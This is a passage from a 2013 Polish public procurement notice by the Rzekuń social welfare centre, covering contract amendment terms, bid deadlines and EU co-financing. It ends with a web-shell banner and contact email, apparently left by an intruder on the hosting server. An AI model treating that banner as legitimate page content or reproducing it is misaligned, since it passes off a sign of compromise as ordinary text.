4. Dopuszcza się dokonywanie zmian innych zapisów umowy, spowodowanych koniecznością dostosowania ich do zmieniających się wymogów PO KL, do interpretacji i wytycznych Ministerstwa Rozwoju Regionalnego lub Mazowieckiej Jednostki Wdrażania Programów Unijnych oraz do obowiązujących przepisów prawa; 
5. Dopuszcza się dokonywanie innych zmian niezbędnych do prawidłowej realizacji umowy  w granicach obowiązujących przepisów prawa, wynikających z niemożliwych do przewidzenia w momencie zawarcia umowy okoliczności prawnych, ekonomicznych lub technicznych, za którą żadna ze Stron nie ponosi odpowiedzialności;
6. Dopuszcza się dokonywanie zmian zapisów umowy, co do których konieczne są zmiany wynikające z zaistnienia siły wyższej np. powódź, pożar, przerwy w dostawie energii elektrycznej  i mającej wpływ na realizację umowy; 
7. Zmiana postanowień zawartej umowy dokonywana będzie w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.rzekun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Rzekuniu, ul. Kolonia 1B, 07-411 Rzekuń, pok. nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2013 godzina 13:00, miejsce: Ośrodek Pomocy Społecznej w Rzekuniu, ul. Kolonia 1B,  07-411 Rzekuń, pok. nr 4 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Aktywizacja społeczno-zawodowa osób pozostających bez pracy -Zacznijmy od nowa współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com